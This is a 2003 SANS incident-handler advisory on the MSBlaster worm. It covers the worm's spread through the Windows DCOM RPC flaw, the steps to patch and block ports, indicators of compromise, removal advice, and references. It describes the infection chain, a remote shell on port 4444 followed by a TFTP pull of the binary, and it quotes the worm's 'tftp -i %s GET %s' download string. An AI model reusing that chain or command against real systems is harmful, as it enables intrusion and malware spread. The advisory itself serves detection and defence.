RPC DCOM WORM (MSBLASTER)

Published: 2003-08-11
Last Updated: 2003-08-14 14:14:29 UTC
by Handlers (Version: 1)
0 comment(s)
This RPC DCOM worm started spreading early afternoon EDT (evening UTC). At this point, it is spreading rapidly.

Increase in port 135 activity:
http://isc.sans.org/images/port135percent.png
**********

NOTE: PRELIMINARY. Do not base your incidents response solely on this
writeup.

**********
Executive Summary:


A worm has started spreading early afternoon EDT (evening UTC Time) and is expected to continue spreading rapidly. This worms exploits the Microsoft Windows DCOM RPC Vulnerability announced July 16, 2003. The SANS Institute, and Incidents.org recommends the following Action Items:

* Close port 135/tcp (and if possible 135-139, 445 and 593)

* Monitor TCP Port 4444 and UDP Port 69 (tftp) which are used by the worm for activity related to this worm.

* Ensure that all available patches have been applied, especially the patches reported in Microsoft Security Bulletin MS03-026.

* This bulletin is available at
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

* Infected machines are recommended to be pulled from the network pending a complete rebuild of the system.
Technical Details:



Names and Aliases:
W32.Blaster.Worm (symantec),W32/Lovsan.worm (McAfee), WORM_MSBLAST.A (Trend Micro),Win32.Posa.Worm (CA),Lovsan (F-secure), MSBLASTER,Win32.Poza.
The name of the binary is msblast.exe. It is packed with UPX and will self
extract. The size of the binary is about 11kByte unpacked, and 6kBytes packed:

MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
Infection sequence:

1. SOURCE sends packets to port 135 tcp with variation
of dcom.c exploit to TARGET

2. this causes a remote shell on port 4444 at the TARGET

3. the SOURCE now sends the tftp get command to the TARGET, using the
shell on port 4444,

4. the target will now connect to the tftp server at the SOURCE.
So far we have found the following properties:

- Scans sequentially for machines with open port 135, starting at a presumably random IP address

- uses multiple TFTP servers to pull the binary

- adds a registry key to start itself after reboot

- infected machines will start a DDOS attack (port 80 synflood) against windowsupdate.com on August 16th.
Name of registry key:

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto update'

Strings of interest:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The worm may launch a syn flood against windowsupdate.com on the 16th. It has the ability to infect Windows 2000, XP and potentially 2003.

The worm uses the RPC DCOM vulnerability to propagate. One it finds a vulnerable
system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp. The exploit itself is very close to 'dcom.c' and so far appears to use the "universal Win2k" offset only.
Detection:
Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c
Removal and Eradication:
Once you are infected, we highly recommend a complete rebuild of the site.
As there have been a number of irc bots using the exploit for a few weeks
now, it is possible that your system was already infected with one of the
prior exploits. Do not connect an unpatched machine to a network.
If you can not do this and/or the computer resides on a protected or non-Internet connected network, then several Anti-Virus Venders have supplied tools to assist in removing the worm. However, these tools can not clean-up damage from other RPC DCOM malware such as the recent sdbot irc bots. This method of cleaning your system is _not_ recommended, but the URLs are presented below for completeness.

http://www.sarc.com/avcenter/venc/data/w32.blaster.worm.removal.tool.html

http://www3.ca.com/Files/VirusInformationAndPrevention/ClnPoza.zip
Other References:

http://www.cert.org/advisories/CA-2003-19.html

http://www.microsoft.com/technet/security/bulletin/MS03-026.asp


https://tms.symantec.com/members/AnalystReports/030811-Alert-DCOMworm.pdf

http://www3.ca.com/virusinfo/virus.aspx?ID=36265

http://www.datafellows.com/v-descs/msblast.shtml

http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100547

http://www.sarc.com/avcenter/venc/data/w32.blaster.worm.html

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
http://www.sophos.com/virusinfo/analyses/w32blastera.html

http://xforce.iss.net/xforce/alerts/id/150

http://vil.nai.com/vil/content/v_100547.htm

http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?IdVirus=40369&sind=0

http://www.cisco.com/warp/customer/707/cisco-sn-20030814-blaster.shtml
Keywords:
0 comment(s)

Comments


Diary Archives